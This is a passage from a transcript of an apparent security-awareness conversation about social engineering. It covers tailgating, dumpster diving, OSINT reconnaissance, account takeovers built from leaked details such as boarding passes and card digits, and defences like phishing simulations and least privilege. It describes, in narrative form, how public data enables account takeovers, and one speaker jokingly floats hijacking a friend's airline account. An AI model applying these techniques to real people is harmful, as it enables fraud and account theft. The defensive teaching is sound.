you know, who are you? Are you the person who should be in here? And many companies
will implement things like security gates where you will have to go through one by one; you
simply can't push through together or it would look really suspicious. Oh, yes, well, and that's
probably true for companies that have something to protect that they know someone else will
have, but I'm thinking in terms of the box example; that could be any company. Well, the
thing is that every company does have something they want to protect because at the very
least, every company these days is a network and attackers want to get in and plug something
into the network so that they've got the system control. Every company has, like I mentioned,
trash cans. They have things in the rubbish bins there that attackers would like to get access
to. Yes. How many times have you been in a company and walked over to the photo copier?
Well, don't you? That's interesting. I wonder who would leave that there. Or the printer, wow,
they're just pumping stuff out and now it's just sitting there, so having access on premise can
give the social engineer some very valuable info.

Social Engineering Reconaissance - Open Source Intelligence (OSINT)

Okay, so that was in-person based social engineering. Of course, the last thing we did is the
door trick to get you on site. Right, I can see how that would work, actually; that's interesting
in practice run. Yes, oh yes it happens, but maybe what we might start to go to now is how
attackers in a social engineering capacity do reconnaissance and they particularly do a lot of
reconnaissance via what we would call OSINT or open source intelligence and there's a lot
you can do with OSINT; there's a lot of information you can find online so think about the
amount of sort of digital footprints, if you like, that we leave all over the place. So you know,
particularly in this day of social media, we have a huge amount of stuff on our profiles. You
and I are both on the other side of the world. For us at the moment we've got social profiles
that advise that, they know which airlines we've been on, you could figure out which flights
we've been on, which airports we've gone through, lots of information out there and what's
interesting is the way this OSINT information starts to get used in text and I brought up one
on the screen here on my PC here from December 2015 and this was by a Brian Krebs and
Brian Krebs is a really, really well-renown security journalist who writes fantastic stuff and
what was happening here was Brian's PayPal account kept getting compromised and the way
the attackers were compromising his account is they were using information which was
effectively sourced from OSINT sources, information such as obviously his name, his email
address, his home address, as well as other sources of information or pieces of information
which had been broadly distributed about him. So they had his social security number, which
as much as people like to think is a sensitive piece of verification data, it gets shared
extensively and the point is, is that this information which was retrievable via open source
intelligence sources, is all the attackers needed to do to verify themselves to PayPal and add
an email address to his account and basically take over his account and they kept doing it
again, and again and again. So Brian would figure it out and he'd change the email address
and then they'd just call up PayPal again and go, hey, it's Brian, I'm locked out again, here's
my information, can you let me back in? Yes, right. So, well, that could happen to anybody.
Well, it could and what's really interesting about this is the way we see organizations
verifying people based on data which is retrievable via OSINT sources. So we've seen other
cases in the whether other really big, well-known brands have verified people based on pieces
of data such as the last four digits of your credit card. Now curiously, the last four digits of
your credit card are exposed in many, many different places. So you'll see them on receipts
very often, yes, which would be in the trash can, which comes back to the dumpster dive
example just before. You will see them in many data breaches, even where the organization is
PCOA compliant. So PCOA being the payment card industry; they say you cannot store full
card numbers, but you can store the last four digits, because you can't defraud the card, but
you can then call up many different organizations and say hey, here's the last four digits of
my card to prove who I am. We've seen other organizations do things like, they won't allow
you to change your password or do anything like that unless you can give them the last four
digits of your card, but they will allow you to put a new card on your account if you have
address, email, phone number, which is retrievable via open source information, and then you
call back the next day. I was going to say, then you know the last four digits. And you go, so
I've got this card on my account, because it's the one I put on there yesterday, right? And then
you have control of the account. So it's really interesting to sort of see how useful this open
source intelligence information is and just how readily available it is. Wow, yes! So let's pick
another example there and in fact, I did a demo at the NDC conference that we were at, or the
one I was at a couple of years ago, and what I showed was what you could do with the
information that was on people's boarding passes and I had a friend who took great pleasure
in announcing to everyone that he'd been upgraded to first class on a particular flight. As you
would, you know, it's probably not uncommon. I understand the temptation, but Lars, don't
do it. I'll tell you why shouldn't do it. Oh, I travel on first class all the time. What he'd done,
well don't post your boarding, if I see you see you post your boarding pass, I will do this. So
what he had done is he'd posted his boarding pass, so a photo of it, a very, very clear, perfect
picture, which obviously includes the flight, the airline, his name, his frequent flyer number,
and what that allows you to do is that is enough information to go to this particular airline and
reset his password. Because what you can do is you can take the name and the frequent flyer
number and you can find the other pieces of information via open source intelligence. Now if
you can find that information and reset his password and if you, hypothetically, were to keep
flying first class and send photos, I would be very, I mean I wouldn't do this, but I would be
very inclined to go on, reset your frequent flyer password and then ask to be put as far down
the back of the airline as possible. You wouldn't do that. Only in travel, but I would do it. So
this is the thing. Look, this is open source intelligence information. So I was, once he put it
on social media and it became so readily available, it effectively became open source
intelligence and that would allow you to take over the account. Now the question of course is
for the likes of the airline involved. Is there enough control if someone can just take OSINT
data and actually take over the account? Yes, they might not know or it's the whole question
of you know, at what point does it become open source, because I would imagine that people,
if they put it on Facebook and they put it so that only their accepted friends can see it, they
would think it's less visible and less global. Keeping in mind that I am a friend, you know. I
know, well. But what was he expecting me not to do? Yes. But look, it does of course depend
on how broadly you socialize it, but you've also got to make the assumption that once you
start putting things on social media, it is almost as good as public and certainly we've seen
many, many cases where people then re-shared things that people have shared on social
media and it's gone out beyond the original scope of what they conceived it was. Absolutely,
and it's the whole thing of if you put something on the internet, you know, it's there forever.
Yes, pretty much and of course, we say this even when you're creating accounts and things
that you expect to be private, but you have to sort of work on this assumption that at some
stage that might not be. Now of course in a case like that, if I was the airline, I would be
wanting to do things like, if we're going to reset passwords, let's at least maybe send the guy
an email. Yes. Okay, you've got to be able to receive an email and even better, if it's
something as critical as the password of your frequent flyer account, which controls your
travel plans, maybe an SMS as well. Yes. Now that could be difficult because the guy is
traveling around the world and he may not have access to SMS, but there are various other
channels that you can use which work on the assumption that there is a lot of data vailable
either publicly or almost publicly, via social media, and you've got to be resilient to the fact
that an adversary could get hold of that. Yes, true, but there's also a case here where it says,
well at what point is it no longer the company's responsibility to babysit you? Yes, look,
there's a bit of a due diligence question there, right? So was there sufficient due diligence on
behalf of the airline in order to keep your information safe? But the problem is, when it
comes down to just a frequent flyer number, one of the thing I noticed actually for this
particular airline, in the past they had sent me baggage tags which have the frequent flyer
number on them. So, you know, now we're talking about okay, my sort of access to
information is if I could follow someone on the plane and they've got the bag over their
shoulder and the frequent flyer tags hanging off and I can see what ultimately is like a 7-digit
number of something, which would be hard, and often has their name and their phone number
on it as well, so you see here, you're ticking of the boxes and this is what an adversary wants
to do. They want to just start ticking off the boxes of all the pieces of information they can
find and they will go to multiple different open source intelligence resources to find that. You
know, if you had someone's frequent flyer number, let's imagine, a hypothetical. You follow
them on the plane. They've got the baggage tag. You've got the frequent flyer number, you've
got their phone number, you've got their name, you also know the flight, and you also know
the airline. That's a lot of information. That's going to be enough to then have a pretty good
chance to start to get more information about them such as what is their LinkedIn profile?
Now I know where they work, now I know what their role is, you know? Now I know who
their associates are and you start pivoting through and finding more and more info like this.
Maybe they've got domains registered in their name with public Who Is records which also
have a home address which is as good as public anyway, but you just start to fill in all the
gaps. I get, yes, I see what you're saying, but there's also the part of it that says, well, you
know, we work for ourselves, we are relying on people knowing who we are and being able
to contact us, so we want them to know certain pieces of information, which may be what
you're just eluding to now is what they need, so you know, how do you project yourself?
How do you? You can't just go offline if that's part of what you do. Well, you know, there's
got to be some pragmatism here as well. I think you saw something I wrote very recently
where one particular company that was having a public social medial discussion with, then
said, look, you might want to delete that Tweet, it had your email address in it, and I said to
them, yes, that's how people send email to me. Like they take the address that I share publicly
and they send it to me, and look, as you say, you and I probably have a greater tolerance for
sharing information publicly, but I suspect what's a bit difference between us and the vast
number of people is that we've got a probably better awareness of what information is public
and it's a conscious decision, understanding the risks, but I like the idea of always working on
the assumption of not sharing anything that you don't have to and that it will at some stage
become public.

How Do We Protect Against Social Engineering?

But I think maybe the bigger question we should address as we start to wrap up is for things
like organizations, okay, for entities such as organizations, how do they protect from a lot of
these attacks that we've looked at? Because we've looked at things like phishing attacks, for
example, and that can really bring an organization undone very quickly, and it does come
down to training. So how is the organization going to train the people? But the training that
we seen in many organizations will consist of a number of things. There will be posters. So
you every time you get your cup of coffee or your tea, you will see a poster which says, don't
share your passwords with other people, and it just becomes this white noise in the
background. You said, yes, I know what, and then you go back to normal life. It may also
consist of once a year you will sit down and answer a questionnaire which effectively says,
you know, Bob has just called up and Bob has asked you for your password; should you give
Bob your password? No, and then you get back to life very quickly and you forget the whole
thing. What I really like is the companies, and there's a company called Phish 5 for example,
which does things like it will run phishing campaigns within your organization. I actually
have an example because I used to work for a company that had a security expert; it was part
of those services that we offered were pen testing, penetration testing and the bosses at the
time decided that now we're going to pen test ourselves. So they got this guy who is a
professional ethical hacker, as it's called, and he engineered, or did a social engineering attack
on the staff in the form of sending us a LinkedIn message that then said something that was
very legit and it came from the directors and said, please click this link and then a week later
we were then, all, you know, we all got the presentation of what information is collected. It
was very, very powerful because you have no idea. I think that's really good on a couple of
fronts. So number one, that would be typically what we call a spear phishing attack. Yes. So,
yes, phishing is what I've got in my mail. There's a million people who just got the same
thing that we looked at before. Spear phishing is very targeted to the organization or to the
individual and it will normally represent information about that target to increase the
authenticity of it, and massively effective because they're very hard to identify when they're
done well. So yes, that was the first thing that resonated with what you just said and I think
the second thing is that exercise was run and I bet it resonated with people in a way that
posters just never do. Oh absolutely because it came as just something that wasn't the
company; it was your personal LinkedIn inbox. Right, and that was very targeted. So that
actually targeted the LinkedIn account of the people in the company. Yes, of each person in
the company. Which would be easy to discover because you can go to LinkedIn and you can
search for everyone and I did this just recently, ethically. You can go and filter down and just
say, give me, for example, all the system administrators within a particular company. Yes,
well, and you can pay for certain levels of access to the people in a certain company and you
can send them direct messages as well. It's not difficult. So conditioning is really good and I
think for anyone that's in an organization and they're conscious of the risk of social
engineering and they're wondering how do we actually help the organization move forward?
Focus on conditioning rather than the tick boxes. I understand why they need the tick boxes;
there are often legal reasons and things like that, but nothing works better than people
actually falling victim to a social engineering attack, done in an ethical way and you know,
the penny really drops there. It was very powerful and I left the company, but I know they've
done it since again, in various different ways. And that's another good point there, too. So this
is not, let us do it once. No, no, not at all. This needs to be continuous and of course, it's
something that you really want to indoctrinate new hires into as well and they don't have to
be expensive, particularly the stuff like Phish 5, I mentioned before; it's not expensive to run,
you just set it up and you run the whole campaign yourself. So just before we wrap up, how
do we summarize this in terms of what, as if you're a company or you're an individual, how
do you get ahead? Like, how do you, how do you mitigate the social engineering that
invariably is going to happen at some level, I would have thought. I think the first thing is
recognizing that social engineering attacks are enormously successful. The success rate of
social engineering attacks is really, really high. So much so or so much more so than so many
other sort of traditional IT-based attacks against systems. So that's the first thing and then
obviously as individuals, learning what those sort of call signs are. So you know, we spoke a
lot about human weaknesses earlier on, so thinking when there is a request for information,
are they trying to exploit a human weakness here? Is it, say, fear because they're pretending
to be my boss? Is it greed and they're offering me something that I'd really like. You know, I
guess having a healthy level of suspicion without becoming too paranoid about life as well.
Absolutely. So that's certainly very important as an individual. Obviously, all the sorts of
good practices that we'd like individuals to use around things like the way they create and
store passwords as well is very important. It's very, very hard to socially engineer out of
someone a massively long, generated, automatic password that's only auto completed into the
legitimate site by a good password manager. And the user doesn't even know it. Yes, exactly,
so you know, that's a good example on the individual level. On a corporate level, recognizing
again that the prevalence of this risk and that humans are often what we refer to as the soft
scent within the hard shell, right? So we have these organizations with firewalls and, you
know, all sorts of network devices and intrusion detection systems, we have an electronic
system such as anti-virus and you know, a lot of things there that operate at a digital level and
then we've got these vulnerable soft matter people like you and I, sitting here controlling the
machines. Letting the guy come in the door. Letting the guy come in the door! I mean, that is
just perfect. How much money goes into securing networks and then you let me through the
door because you're being nice. You know, so recognizing that that happens and I think
again, the big thing for organizations is working on the assumptions that the humans are
compromised, yes? So for example, let us apply the principle of least privilege. Let's ensure
that people only have access to the things that they need in order to do their jobs. Someone
told me a story the other day. They said, they used to have a manager who said that because
he is the manager of the people, he should have the rights of everyone underneath them
because he can tell them what to do anyway, and he had that and then his 5-year-old son
came in and played with his computer. Yes. And it's not necessarily that you expect the
humans to have malice, okay? No, no. Okay? It's not that they're setting out to be evil, it's that
they can be coerced into doing things that they didn't intend to do and if they don't have the
access to systems, then they can't get anything of it. Now you give them what they need,
right? But you don't give them anymore. Yes, absolutely. And I think finally, that point we
touched on just before about training, so let us train the humans, but more specifically let us
condition them. So let us, make sure that they experience this. Yes, and don't just do it once.
It's a continuous educational process. Make it ongoing. Make it part of the process, right?
Part of the psyche of the organization and if you make it boring and if you make people just
sit there through endless videos and just fill out forms, it really not going to resonate with
them. No, they just want to get through it as quickly as possible. Well look, I think on that
note we've pretty much solved the world's problems in terms of social engineering.
Absolutely. So hopefully, if individual pick that up and organizations pick that up, this will
become a much smaller thing than what it is at the moment. So thanks very much, mate. I
think that wraps up another good play-by-play. Absolutely! Thanks very much. Very
educational. Good on you. Okay.